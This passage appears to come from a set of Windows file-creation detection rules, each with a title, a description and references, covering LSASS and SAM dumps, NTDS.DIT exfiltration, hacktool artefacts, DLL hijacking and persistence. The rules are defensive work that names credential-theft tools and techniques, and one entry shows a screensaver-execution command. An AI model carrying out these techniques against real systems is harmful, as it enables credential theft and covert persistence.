Detects the creation of files with well-known filenames (parts of credential dump software or files produced by them) |
https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment |
WScript or CScript Dropper - File |
Detects a file ending in jse, vbe, js, vba, vbs written by cscript.exe or wscript.exe |
WScript or CScript Dropper (cea72823-df4d-4567-950c-0b579eaf0846) |
Dynamic CSharp Compile Artefact |
When C# is compiled dynamically, a .cmdline file will be created as a part of the process.
Certain processes are not typically observed compiling C# code, but can do so without touching disk.
This can be used to unpack a payload for execution.
|
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1027.004/T1027.004.md#atomic-test-2---dynamic-c-compile |
CSExec Service File Creation |
Detects default CSExec service filename which indicates CSExec service installation and execution |
https://github.com/malcomvetter/CSExec |
Potential DCOM InternetExplorer.Application DLL Hijack |
Detects potential DLL hijack of "iertutil.dll" found in the DCOM InternetExplorer.Application Class over the network |
https://threathunterplaybook.com/hunts/windows/201009-RemoteDCOMIErtUtilDLLHijack/notebook.html |
DLL Search Order Hijacking Via Additional Space in Path |
Detects when an attacker creates a folder structure similar to Windows system folders (such as Windows, Program Files...)
but with an additional space, in order to trick the DLL load search order and perform a "DLL Search Order Hijacking" attack
|
https://twitter.com/cyb3rops/status/1552932770464292864, https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows |
Potentially Suspicious DMP/HDMP File Creation |
Detects the creation of a file with the ".dmp"/".hdmp" extension by a shell or scripting application such as "cmd", "powershell", etc. Often created by software during a crash. Memory dumps can sometimes contain sensitive information such as credentials. It's best to determine the source of the crash. |
https://learn.microsoft.com/en-us/windows/win32/wer/collecting-user-mode-dumps |
Potential Persistence Attempt Via ErrorHandler.Cmd |
Detects the creation of a file named "ErrorHandler.cmd" in the "C:\WINDOWS\Setup\Scripts\" directory which could be used as a method of persistence.
The content of C:\WINDOWS\Setup\Scripts\ErrorHandler.cmd is read whenever some tools under C:\WINDOWS\System32\oobe\ (e.g. Setup.exe) fail to run for any reason.
|
https://www.hexacorn.com/blog/2022/01/16/beyond-good-ol-run-key-part-135/, https://github.com/last-byte/PersistenceSniper |
Suspicious ASPX File Drop by Exchange |
Detects suspicious file type dropped by an Exchange component in IIS into a suspicious folder |
https://www.microsoft.com/security/blog/2022/09/30/analyzing-attacks-using-the-exchange-vulnerabilities-cve-2022-41040-and-cve-2022-41082/, https://www.gteltsc.vn/blog/canh-bao-chien-dich-tan-cong-su-dung-lo-hong-zero-day-tren-microsoft-exchange-server-12714.html, https://en.gteltsc.vn/blog/cap-nhat-nhe-ve-lo-hong-bao-mat-0day-microsoft-exchange-dang-duoc-su-dung-de-tan-cong-cac-to-chuc-tai-viet-nam-9685.html |
Suspicious File Drop by Exchange |
Detects suspicious file type dropped by an Exchange component in IIS |
https://www.microsoft.com/security/blog/2022/09/30/analyzing-attacks-using-the-exchange-vulnerabilities-cve-2022-41040-and-cve-2022-41082/, https://www.gteltsc.vn/blog/canh-bao-chien-dich-tan-cong-su-dung-lo-hong-zero-day-tren-microsoft-exchange-server-12714.html, https://en.gteltsc.vn/blog/cap-nhat-nhe-ve-lo-hong-bao-mat-0day-microsoft-exchange-dang-duoc-su-dung-de-tan-cong-cac-to-chuc-tai-viet-nam-9685.html |
GoToAssist Temporary Installation Artefact |
An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc., to establish an interactive command and control channel to target systems within networks.
These services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment.
Remote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land)
|
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1219/T1219.md#atomic-test-4---gotoassist-files-detected-test-on-windows |
HackTool - CrackMapExec File Indicators |
Detects file creation events with filename patterns used by CrackMapExec. |
https://github.com/byt3bl33d3r/CrackMapExec/ |
HackTool - Typical HiveNightmare SAM File Export |
Detects files written by the different tools that exploit HiveNightmare |
https://github.com/GossiTheDog/HiveNightmare, https://github.com/FireFart/hivenightmare/, https://github.com/WiredPulse/Invoke-HiveNightmare, https://twitter.com/cube0x0/status/1418920190759378944 |
HackTool - Dumpert Process Dumper Default File |
Detects the creation of the default dump file used by the Outflank Dumpert tool, a process dumper which dumps the LSASS process memory. |
https://github.com/outflanknl/Dumpert, https://unit42.paloaltonetworks.com/actors-still-exploiting-sharepoint-vulnerability/ |
HackTool - Inveigh Execution Artefacts |
Detects the presence and execution of Inveigh via dropped artefacts |
https://github.com/Kevin-Robertson/Inveigh/blob/29d9e3c3a625b3033cdaf4683efaafadcecb9007/Inveigh/Support/Output.cs, https://github.com/Kevin-Robertson/Inveigh/blob/29d9e3c3a625b3033cdaf4683efaafadcecb9007/Inveigh/Support/Control.cs, https://thedfirreport.com/2020/11/23/pysa-mespinoza-ransomware/ |
HackTool - Mimikatz Kirbi File Creation |
Detects the creation of files generated by Mimikatz, such as ".kirbi", "mimilsa.log", etc. |
https://cobalt.io/blog/kerberoast-attack-techniques, https://pentestlab.blog/2019/10/21/persistence-security-support-provider/ |
HackTool - RemoteKrbRelay SMB Relay Secrets Dump Module Indicators |
Detects the creation of files with specific names used by the RemoteKrbRelay SMB Relay attack module. |
https://github.com/CICADA8-Research/RemoteKrbRelay/blob/19ec76ba7aa50c2722b23359bc4541c0a9b2611c/Exploit/RemoteKrbRelay/Relay/Attacks/RemoteRegistry.cs#L31-L40 |
HackTool - NPPSpy Hacktool Usage |
Detects the use of the NPPSpy hacktool, which stores the cleartext passwords of users who logged in to a local file |
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1003/T1003.md#atomic-test-2---credential-dumping-with-nppspy, https://twitter.com/0gtweet/status/1465282548494487554 |
HackTool - Powerup Write Hijack DLL |
The PowerUp tool's Write-HijackDll exploits DLL hijacking for privilege escalation.
In its default mode, it builds a self-deleting .bat file which executes a malicious command.
The detection rule relies on the creation of the malicious .bat file (debug.bat by default).
|
https://powersploit.readthedocs.io/en/latest/Privesc/Write-HijackDll/ |
HackTool - QuarksPwDump Dump File |
Detects a dump file written by QuarksPwDump password dumper |
https://jpcertcc.github.io/ToolAnalysisResultSheet/details/QuarksPWDump.htm |
HackTool - Potential Remote Credential Dumping Activity Via CrackMapExec Or Impacket-Secretsdump |
Detects default filenames output from the execution of CrackMapExec and Impacket-secretsdump against an endpoint. |
https://github.com/Porchetta-Industries/CrackMapExec, https://github.com/SecureAuthCorp/impacket/blob/master/examples/secretsdump.py |
HackTool - SafetyKatz Dump Indicator |
Detects default lsass dump filename generated by SafetyKatz. |
https://github.com/GhostPack/SafetyKatz, https://github.com/GhostPack/SafetyKatz/blob/715b311f76eb3a4c8d00a1bd29c6cd1899e450b7/SafetyKatz/Program.cs#L63 |
Potential Initial Access via DLL Search Order Hijacking |
Detects attempts to create a DLL file in a known desktop application dependencies folder, such as those of Slack, Teams or OneDrive, by an unusual process. This may indicate an attempt to load a malicious module via DLL search order hijacking. |
https://github.com/elastic/protections-artifacts/commit/746086721fd385d9f5c6647cada1788db4aea95f#diff-5d46dd4ac6866b4337ec126be8cee0e115467b3e8703794ba6f6df6432c806bc, https://posts.specterops.io/automating-dll-hijack-discovery-81c4295904b0 |
Installation of TeamViewer Desktop |
TeamViewer_Desktop.exe is created during install |
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1219/T1219.md#atomic-test-1---teamviewer-files-detected-test-on-windows |
Malicious DLL File Dropped in the Teams or OneDrive Folder |
Detects creation of a malicious DLL file in the location where the OneDrive or Teams applications
Upon execution of the Teams or OneDrive application, the dropped malicious DLL file ("iphlpapi.dll") is sideloaded.
|
https://blog.cyble.com/2022/07/27/targeted-attacks-being-carried-out-via-dll-sideloading/ |
ISO File Created Within Temp Folders |
Detects the creation of an ISO file in the Outlook temp folder or in the AppData temp folder. Typical of the Qakbot TTP seen from end-July 2022. |
https://twitter.com/Sam0x90/status/1552011547974696960, https://securityaffairs.co/wordpress/133680/malware/dll-sideloading-spread-qakbot.html, https://github.com/redcanaryco/atomic-red-team/blob/0f229c0e42bfe7ca736a14023836d65baa941ed2/atomics/T1553.005/T1553.005.md#atomic-test-1---mount-iso-image |
ISO or Image Mount Indicator in Recent Files |
Detects the creation of a recent-item file that points to an .ISO, .IMG, .VHD or .VHDX file, as often used in phishing attacks.
This can be a false positive on server systems, but on workstations users should rarely mount .iso or .img files.
|
https://www.microsoft.com/security/blog/2021/05/27/new-sophisticated-email-based-attack-from-nobelium/, https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/malicious-spam-campaign-uses-iso-image-files-to-deliver-lokibot-and-nanocore, https://blog.emsisoft.com/en/32373/beware-new-wave-of-malware-spreads-via-iso-file-email-attachments/, https://insights.sei.cmu.edu/blog/the-dangers-of-vhd-and-vhdx-files/ |
GatherNetworkInfo.VBS Reconnaissance Script Output |
Detects creation of files which are the results of executing the built-in reconnaissance script "C:\Windows\System32\gatherNetworkInfo.vbs". |
https://posts.slayerlabs.com/living-off-the-land/#gathernetworkinfovbs, https://www.mandiant.com/resources/blog/trojanized-windows-installers-ukrainian-government |
LSASS Process Memory Dump Files |
Detects creation of files with names used by different memory dumping tools to create a memory dump of the LSASS process memory, which contains user credentials. |
https://www.google.com/search?q=procdump+lsass, https://medium.com/@markmotig/some-ways-to-dump-lsass-exe-c4a75fdc49bf, https://github.com/elastic/detection-rules/blob/c76a39796972ecde44cb1da6df47f1b6562c9770/rules/windows/credential_access_lsass_memdump_file_created.toml, https://www.whiteoaksecurity.com/blog/attacks-defenses-dumping-lsass-no-mimikatz/, https://github.com/helpsystems/nanodump, https://github.com/CCob/MirrorDump, https://github.com/safedv/RustiveDump/blob/1a9b026b477587becfb62df9677cede619d42030/src/main.rs#L35, https://github.com/ricardojoserf/NativeDump/blob/01d8cd17f31f51f5955a38e85cd3c83a17596175/NativeDump/Program.cs#L258 |
LSASS Process Dump Artefact In CrashDumps Folder |
Detects the presence of an LSASS dump file in the "CrashDumps" folder. This could be a sign of LSASS credential dumping. Techniques such as the LSASS Shtinkering have been seen abusing the Windows Error Reporting to dump said process. |
https://github.com/deepinstinct/Lsass-Shtinkering, https://media.defcon.org/DEF%20CON%2030/DEF%20CON%2030%20presentations/Asaf%20Gilboa%20-%20LSASS%20Shtinkering%20Abusing%20Windows%20Error%20Reporting%20to%20Dump%20LSASS.pdf |
WerFault LSASS Process Memory Dump |
Detects WerFault creating a dump file with a name that indicates that the dump file could be an LSASS process memory dump, which contains user credentials |
https://github.com/helpsystems/nanodump |
Octopus Scanner Malware |
Detects Octopus Scanner Malware. |
https://securitylab.github.com/research/octopus-scanner-malware-open-source-supply-chain |
Adwind RAT / JRAT File Artifact |
Detects javaw.exe in AppData folder as used by Adwind / JRAT |
https://www.hybrid-analysis.com/sample/ba86fa0d4b6af2db0656a88b1dd29f36fe362473ae8ad04255c4e52f214a541c?environmentId=100, https://www.first.org/resources/papers/conf2017/Advanced-Incident-Detection-and-Threat-Hunting-using-Sysmon-and-Splunk.pdf |
File Creation In Suspicious Directory By Msdt.EXE |
Detects msdt.exe creating files in suspicious directories, which could be a sign of exploitation of either the Follina or DogWalk vulnerabilities |
https://irsl.medium.com/the-trouble-with-microsofts-troubleshooters-6e32fc80b8bd, https://msrc-blog.microsoft.com/2022/05/30/guidance-for-cve-2022-30190-microsoft-support-diagnostic-tool-vulnerability/ |
Uncommon File Creation By Mysql Daemon Process |
Detects the creation of files with scripting or executable extensions by the MySQL daemon,
which could be an indicator of "User Defined Functions" abuse to download malware.
|
https://asec.ahnlab.com/en/58878/, https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/honeypot-recon-mysql-malware-infection-via-user-defined-functions-udf/ |
Suspicious DotNET CLR Usage Log Artifact |
Detects the creation of Usage Log files by the CLR (clr.dll). These files are named after the executing process once the assembly is finished executing for the first time in the (user) session context. |
https://bohops.com/2021/03/16/investigating-net-clr-usage-log-tampering-techniques-for-edr-evasion/, https://github.com/olafhartong/sysmon-modular/blob/fa1ae53132403d262be2bbd7f17ceea7e15e8c78/11_file_create/include_dotnet.xml, https://web.archive.org/web/20221026202428/https://gist.github.com/code-scrap/d7f152ffcdb3e0b02f7f394f5187f008, https://web.archive.org/web/20230329154538/https://blog.menasec.net/2019/07/interesting-difr-traces-of-net-clr.html |
Suspicious File Creation In Uncommon AppData Folder |
Detects the creation of suspicious files and folders inside the user's AppData folder but not inside any of the common and well-known directories (Local, Roaming, LocalLow). This could be used to bypass detections that exclude the AppData folder for fear of false positives |
Internal Research |
SCR File Write Event |
Detects the creation of screensaver files (.scr) outside of system folders. Attackers may execute an application as an ".SCR" file using "rundll32.exe desk.cpl,InstallScreenSaver" for example. |
https://lolbas-project.github.io/lolbas/Libraries/Desk/ |
Potential Persistence Via Notepad++ Plugins |
Detects creation of new ".dll" files inside the plugins directory of a Notepad++ installation by a process other than "gup.exe", which could indicate possible persistence |
https://pentestlab.blog/2022/02/14/persistence-notepad-plugins/ |
NTDS.DIT Created |
Detects creation of a file named "ntds.dit" (Active Directory Database) |
Internal Research |
NTDS.DIT Creation By Uncommon Parent Process |
Detects creation of a file named "ntds.dit" (Active Directory Database) by an uncommon parent process or directory |
https://www.ired.team/offensive-security/credential-access-and-credential-dumping/ntds.dit-enumeration, https://www.n00py.io/2022/03/manipulating-user-passwords-without-mimikatz/, https://pentestlab.blog/tag/ntds-dit/, https://github.com/samratashok/nishang/blob/414ee1104526d7057f9adaeee196d91ae447283e/Gather/Copy-VSS.ps1 |
NTDS.DIT Creation By Uncommon Process |
Detects creation of a file named "ntds.dit" (Active Directory Database) by an uncommon process or a process located in a suspicious directory |
https://stealthbits.com/blog/extracting-password-hashes-from-the-ntds-dit-file/, https://adsecurity.org/?p=2398 |
NTDS Exfiltration Filename Patterns |
Detects creation of files with specific name patterns seen used in various tools that export the NTDS.DIT for exfiltration. |
https://github.com/rapid7/metasploit-framework/blob/eb6535009f5fdafa954525687f09294918b5398d/modules/post/windows/gather/ntds_grabber.rb, https://github.com/rapid7/metasploit-framework/blob/eb6535009f5fdafa954525687f09294918b5398d/data/post/powershell/NTDSgrab.ps1, https://github.com/SecureAuthCorp/impacket/blob/7d2991d78836b376452ca58b3d14daa61b67cb40/impacket/examples/secretsdump.py#L2405 |
Office Macro File Creation |
Detects the creation of new Office macro files on the system |
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1566.001/T1566.001.md, https://learn.microsoft.com/en-us/deployoffice/compat/office-file-format-reference |
Potential Persistence Via Microsoft Office Add-In |
Detects potential persistence activity via startup add-ins that load when Microsoft Office starts (.wll/.xll are simply .dll fit for Word or Excel). |
Internal Research, https://labs.withsecure.com/publications/add-in-opportunities-for-office-persistence, https://github.com/redcanaryco/atomic-red-team/blob/4ae9580a1a8772db87a1b6cdb0d03e5af231e966/atomics/T1137.006/T1137.006.md |
Office Macro File Download |
Detects the creation of new Office macro files on the system via an application (browser, mail client). |
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1566.001/T1566.001.md, https://learn.microsoft.com/en-us/deployoffice/compat/office-file-format-reference |
Office Macro File Creation From Suspicious Process |
Detects the creation of an Office macro file by a suspicious process |
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1566.001/T1566.001.md, https://learn.microsoft.com/en-us/deployoffice/compat/office-file-format-reference |
OneNote Attachment File Dropped In Suspicious Location |
Detects creation of files with the ".one"/".onepkg" extension in suspicious or uncommon locations. This could be a sign of attackers abusing OneNote attachments |
https://www.bleepingcomputer.com/news/security/hackers-now-use-microsoft-onenote-attachments-to-spread-malware/, https://blog.osarmor.com/319/onenote-attachment-delivers-asyncrat-malware/ |
Suspicious File Created Via OneNote Application |
Detects suspicious files created via the OneNote application. This could indicate that a potentially malicious ".one"/".onepkg" file was executed, as seen in malware activity in the wild |
https://www.bleepingcomputer.com/news/security/hackers-now-use-microsoft-onenote-attachments-to-spread-malware/, https://blog.osarmor.com/319/onenote-attachment-delivers-asyncrat-malware/, https://twitter.com/MaD_c4t/status/1623414582382567424, https://labs.withsecure.com/publications/detecting-onenote-abuse, https://www.trustedsec.com/blog/new-attacks-old-tricks-how-onenote-malware-is-evolving/, https://app.any.run/tasks/17f2d378-6d11-4d6f-8340-954b04f35e83/ |
New Outlook Macro Created |
Detects the creation of a macro file for Outlook. |
https://www.mdsec.co.uk/2020/11/a-fresh-outlook-on-mail-based-persistence/ |
.RDP File Created by Outlook Process |
Detects the creation of files with the ".rdp" extensions in the temporary directory that Outlook uses when opening attachments.
This can be used to detect spear-phishing campaigns that use RDP files as attachments.
|
https://thecyberexpress.com/rogue-rdp-files-used-in-ukraine-cyberattacks/, https://www.microsoft.com/en-us/security/blog/2024/10/29/midnight-blizzard-conducts-large-scale-spear-phishing-campaign-using-rdp-files/, https://www.linkedin.com/feed/update/urn:li:ugcPost:7257437202706493443?commentUrn=urn%3Ali%3Acomment%3A%28ugcPost%3A7257437202706493443%2C7257522819985543168%29&dashCommentUrn=urn%3Ali%3Afsd_comment%3A%287257522819985543168%2Curn%3Ali%3AugcPost%3A7257437202706493443%29 |
PCRE.NET Package Temp Files |
Detects processes creating temp files related to the PCRE.NET package |
https://twitter.com/rbmaslen/status/1321859647091970051, https://twitter.com/tifkin_/status/1321916444557365248 |
Suspicious Outlook Macro Created |
Detects the creation of a macro file for Outlook. |
https://www.mdsec.co.uk/2020/11/a-fresh-outlook-on-mail-based-persistence/, https://speakerdeck.com/heirhabarov/hunting-for-persistence-via-microsoft-exchange-server-or-outlook?slide=53, https://www.linkedin.com/pulse/outlook-backdoor-using-vba-samir-b-/ |
Publisher Attachment File Dropped In Suspicious Location |
Detects creation of files with the ".pub" extension in suspicious or uncommon locations. This could be a sign of attackers abusing Publisher documents |
https://twitter.com/EmericNasi/status/1623224526220804098 |
Potential Persistence Via Microsoft Office Startup Folder |
Detects creation of Microsoft Office files inside of one of the default startup folders in order to achieve persistence. |
https://insight-jp.nttsecurity.com/post/102hojk/operation-restylink-apt-campaign-targeting-japanese-companies, https://learn.microsoft.com/en-us/office/troubleshoot/excel/use-startup-folders |
File With Uncommon Extension Created By An Office Application |
Detects the creation of files with an executable or script extension by an Office application. |
https://thedfirreport.com/2021/03/29/sodinokibi-aka-revil-ransomware/, https://github.com/vadim-hunter/Detection-Ideas-Rules/blob/02bcbfc2bfb8b4da601bb30de0344ae453aa1afe/Threat%20Intelligence/The%20DFIR%20Report/20210329_Sodinokibi_(aka_REvil)_Ransomware.yaml |
Uncommon File Created In Office Startup Folder |
Detects the creation of a file with an uncommon extension in an Office application startup folder |
https://app.any.run/tasks/d6fe6624-6ef8-485d-aa75-3d1bdda2a08c/, http://addbalance.com/word/startup.htm, https://answers.microsoft.com/en-us/msoffice/forum/all/document-in-word-startup-folder-doesnt-open-when/44ab0932-2917-4150-8cdc-2f2cf39e86f3, https://en.wikipedia.org/wiki/List_of_Microsoft_Office_filename_extensions |
Potential Persistence Via Outlook Form |
Detects the creation of a new Outlook form which can contain malicious code |
https://speakerdeck.com/heirhabarov/hunting-for-persistence-via-microsoft-exchange-server-or-outlook?slide=76, https://speakerdeck.com/heirhabarov/hunting-for-persistence-via-microsoft-exchange-server-or-outlook?slide=79, https://learn.microsoft.com/en-us/office/vba/outlook/concepts/outlook-forms/create-an-outlook-form, https://www.slipstick.com/developer/custom-form/clean-outlooks-forms-cache/ |
Suspicious File Created In PerfLogs |
Detects suspicious files, based on their extension, being created in "C:\PerfLogs\". Note that this directory mostly contains ".etl" files |
Internal Research, https://labs.withsecure.com/publications/fin7-target-veeam-servers |
Potential Binary Or Script Dropper Via PowerShell |
Detects PowerShell creating a binary executable or a script file. |
https://www.zscaler.com/blogs/security-research/onenote-growing-threat-malware-distribution |
PowerShell Script Dropped Via PowerShell.EXE |
Detects PowerShell creating a PowerShell file (.ps1). While this behavior is often benign, it can sometimes be a sign of a dropper script trying to achieve persistence. |
https://www.zscaler.com/blogs/security-research/onenote-growing-threat-malware-distribution |
Malicious PowerShell Scripts - FileCreation |
Detects the creation of known offensive PowerShell scripts used for exploitation |
https://github.com/PowerShellMafia/PowerSploit, https://github.com/NetSPI/PowerUpSQL, https://github.com/CsEnox/EventViewer-UACBypass, https://web.archive.org/web/20210511204621/https://github.com/AlsidOfficial/WSUSpendu, https://github.com/nettitude/Invoke-PowerThIEf, https://github.com/S3cur3Th1sSh1t/WinPwn, https://github.com/S3cur3Th1sSh1t/PowerSharpPack/tree/master/PowerSharpBinaries, https://github.com/BC-SECURITY/Invoke-ZeroLogon/blob/111d17c7fec486d9bb23387e2e828b09a26075e4/Invoke-ZeroLogon.ps1, https://github.com/xorrior/RandomPS-Scripts/blob/848c919bfce4e2d67b626cbcf4404341cfe3d3b6/Get-DXWebcamVideo.ps1, https://github.com/rvrsh3ll/Misc-Powershell-Scripts/blob/6f23bb41f9675d7e2d32bacccff75e931ae00554/OfficeMemScraper.ps1, https://github.com/dafthack/DomainPasswordSpray/blob/b13d64a5834694aa73fd2aea9911a83027c465a7/DomainPasswordSpray.ps1, https://unit42.paloaltonetworks.com/threat-assessment-black-basta-ransomware/, https://research.nccgroup.com/2022/06/06/shining-the-light-on-black-basta/, https://github.com/HarmJ0y/DAMP, https://github.com/samratashok/nishang, https://github.com/DarkCoderSc/PowerRunAsSystem/, https://github.com/besimorhino/powercat, https://github.com/Kevin-Robertson/Powermad, https://github.com/adrecon/ADRecon, https://github.com/adrecon/AzureADRecon |
PowerShell Module File Created |
Detects the creation of a new PowerShell module ".psm1", ".psd1", ".dll", ".ps1", etc. |
Internal Research, https://learn.microsoft.com/en-us/powershell/scripting/developer/module/understanding-a-windows-powershell-module?view=powershell-7.3 |
PowerShell Module File Created By Non-PowerShell Process |
Detects the creation of a new PowerShell module ".psm1", ".psd1", ".dll", ".ps1", etc. by a non-PowerShell process |
Internal Research, https://learn.microsoft.com/en-us/powershell/scripting/developer/module/understanding-a-windows-powershell-module?view=powershell-7.3 |
Potential Suspicious PowerShell Module File Created |
Detects the creation of a new PowerShell module in the first folder of the module directory structure, e.g. "\WindowsPowerShell\Modules\malware\malware.psm1". This is a somewhat uncommon practice, as legitimate modules often include a version folder. |
Internal Research, https://learn.microsoft.com/en-us/powershell/scripting/developer/module/understanding-a-windows-powershell-module?view=powershell-7.3 |
Potential Startup Shortcut Persistence Via PowerShell.EXE |
Detects PowerShell writing startup shortcuts.
This procedure was highlighted in Red Canary Intel Insights Oct. 2021, "We frequently observe adversaries using PowerShell to write malicious .lnk files into the startup directory to establish persistence.
Accordingly, this detection opportunity is likely to identify persistence mechanisms in multiple threats.
In the context of Yellow Cockatoo, this persistence mechanism eventually launches the command-line script that leads to the installation of a malicious DLL"
|
https://redcanary.com/blog/intelligence-insights-october-2021/, https://github.com/redcanaryco/atomic-red-team/blob/36d49de4c8b00bf36054294b4a1fcbab3917d7c5/atomics/T1547.001/T1547.001.md#atomic-test-7---add-executable-shortcut-link-to-user-startup-folder |
PSScriptPolicyTest Creation By Uncommon Process |
Detects the creation of the "PSScriptPolicyTest" PowerShell script by an uncommon process. This file is usually generated by Microsoft PowerShell to test against AppLocker. |
https://www.paloaltonetworks.com/blog/security-operations/stopping-powershell-without-powershell/ |
Rclone Config File Creation |
Detects Rclone config files being created |
https://research.nccgroup.com/2021/05/27/detecting-rclone-an-effective-tool-for-exfiltration/ |
.RDP File Created By Uncommon Application |
Detects creation of a file with an ".rdp" extension by an application that doesn't commonly create such files.
|
https://www.blackhillsinfosec.com/rogue-rdp-revisiting-initial-access-methods/, https://web.archive.org/web/20230726144748/https://blog.thickmints.dev/mintsights/detecting-rogue-rdp/ |
Potential Winnti Dropper Activity |
Detects files dropped by Winnti as described in RedMimicry Winnti playbook |
https://redmimicry.com/posts/redmimicry-winnti/#dropper |
PDF File Created By RegEdit.EXE |
Detects the creation of a file with the ".pdf" extension by the "RegEdit.exe" process.
This indicates that a user is trying to print/save a registry key as a PDF in order to potentially extract sensitive information and bypass defenses.
|
https://sensepost.com/blog/2024/dumping-lsa-secrets-a-story-about-task-decorrelation/ |
RemCom Service File Creation |
Detects the default RemCom service filename, which indicates RemCom service installation and execution |
https://github.com/kavika13/RemCom/ |
ScreenConnect Temporary Installation Artefact |
An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc., to establish an interactive command and control channel to target systems within networks.
These services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment.
Remote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land)
|
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1219/T1219.md#atomic-test-5---screenconnect-application-download-and-install-on-windows |
Remote Access Tool - ScreenConnect Temporary File |
Detects the creation of files in a specific location by ScreenConnect RMM.
ScreenConnect has a feature to remotely execute binaries on a target machine. These binaries will be dropped to ":\Users\\Documents\ConnectWiseControl\Temp\" before execution.
|
https://github.com/SigmaHQ/sigma/pull/4467 |
Potential RipZip Attack on Startup Folder |
Detects a phishing attack which expands a ZIP file containing a malicious shortcut.
If the victim expands the ZIP file via the explorer process, then the explorer process expands the malicious ZIP file and drops a malicious shortcut redirected to a backdoor into the Startup folder.
Additionally, the file name of the malicious shortcut in the Startup folder contains {0AFACED1-E828-11D1-9187-B532F1E9575D}, which denotes the folder shortcut operation.
|
https://twitter.com/jonasLyk/status/1549338335243534336?t=CrmPocBGLbDyE4p6zTX1cg&s=19 |
Potential SAM Database Dump |
Detects the creation of files that look like exports of the local SAM (Security Account Manager) |
https://github.com/search?q=CVE-2021-36934, https://web.archive.org/web/20210725081645/https://github.com/cube0x0/CVE-2021-36934, https://www.google.com/search?q=%22reg.exe+save%22+sam, https://github.com/HuskyHacks/ShadowSteal, https://github.com/FireFart/hivenightmare |
Self Extraction Directive File Created In Potentially Suspicious Location |
Detects the creation of Self Extraction Directive files (.sed) in a potentially suspicious location.
These files are used by the "iexpress.exe" utility in order to create self extracting packages.
Attackers were seen abusing this utility and creating PE files with embedded ".sed" entries.
|
https://strontic.github.io/xcyclopedia/library/iexpress.exe-D594B2A33EFAFD0EABF09E3FDC05FCEA.html, https://en.wikipedia.org/wiki/IExpress, https://www.virustotal.com/gui/file/602f4ae507fa8de57ada079adff25a6c2a899bd25cd092d0af7e62cdb619c93c/behavior |
Windows Shell/Scripting Application File Write to Suspicious Folder |
Detects Windows shells and scripting applications that write files to suspicious folders |
Internal Research |
Windows Binaries Write Suspicious Extensions |
Detects Windows executables that write files with suspicious extensions |
Internal Research |
Startup Folder File Write |
A general detection for files being created in the Windows startup directory. This could be an indicator of persistence. |
https://github.com/OTRF/detection-hackathon-apt29/issues/12, https://github.com/OTRF/ThreatHunter-Playbook/blob/2d4257f630f4c9770f78d0c1df059f891ffc3fec/docs/evals/apt29/detections/5.B.1_611FCA99-97D0-4873-9E51-1C1BA2DBB40D.md |
Suspicious Creation with Colorcpl |
Once executed, colorcpl.exe will copy an arbitrary file to c:\windows\system32\spool\drivers\color\ |
https://twitter.com/eral4m/status/1480468728324231172?s=20 |
Created Files by Microsoft Sync Center |
This rule detects suspicious files created by Microsoft Sync Center (mobsync) |
https://redcanary.com/blog/intelligence-insights-november-2021/ |
Suspicious Files in Default GPO Folder |
Detects the creation of copies of suspicious files (EXE/DLL) in the default GPO storage folder |
https://redcanary.com/blog/intelligence-insights-november-2021/ |
Suspicious Desktopimgdownldr Target File |
Detects a suspicious Microsoft desktopimgdownldr file creation that stores a file to a suspicious location or contains a file with a suspicious extension |
https://labs.sentinelone.com/living-off-windows-land-a-new-native-file-downldr/, https://twitter.com/SBousseaden/status/1278977301745741825 |
Suspicious desktop.ini Action |
Detects unusual processes accessing desktop.ini, which can be leveraged to alter how Explorer displays a folder's content (i.e. renaming files) without changing them on disk. |
https://isc.sans.edu/forums/diary/Desktopini+as+a+postexploitation+tool/25912/ |
Suspicious Creation TXT File in User Desktop |
Detects ransomware creating a .txt file on the user's Desktop |
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1486/T1486.md#atomic-test-5---purelocker-ransom-note |
Creation of a Diagcab |
Detects the creation of a diagcab file, which could be caused by some legitimate installer or be a sign of exploitation (review the filename and its location) |
https://threadreaderapp.com/thread/1533879688141086720.html |
DPAPI Backup Keys And Certificate Export Activity IOC |
Detects file names with specific patterns seen generated and used by tools such as Mimikatz and DSInternals related to exported or stolen DPAPI backup keys and certificates.
|
https://www.dsinternals.com/en/dpapi-backup-key-theft-auditing/, https://github.com/MichaelGrafnetter/DSInternals/blob/39ee8a69bbdc1cfd12c9afdd7513b4788c4895d4/Src/DSInternals.Common/Data/DPAPI/DPAPIBackupKey.cs#L28-L32 |
Suspicious Double Extension Files |
Detects dropped files with double extensions, which are often used by malware to abuse the fact that Windows hides known file extensions by default. |
https://www.crowdstrike.com/blog/meet-crowdstrikes-adversary-of-the-month-for-june-mustang-panda/, https://www.anomali.com/blog/china-based-apt-mustang-panda-targets-minority-groups-public-and-private-sector-organizations, https://www.cybereason.com/blog/research/a-bazar-of-tricks-following-team9s-development-cycles, https://twitter.com/malwrhunterteam/status/1235135745611960321, https://twitter.com/luc4m/status/1073181154126254080 |
Suspicious MSExchangeMailboxReplication ASPX Write |
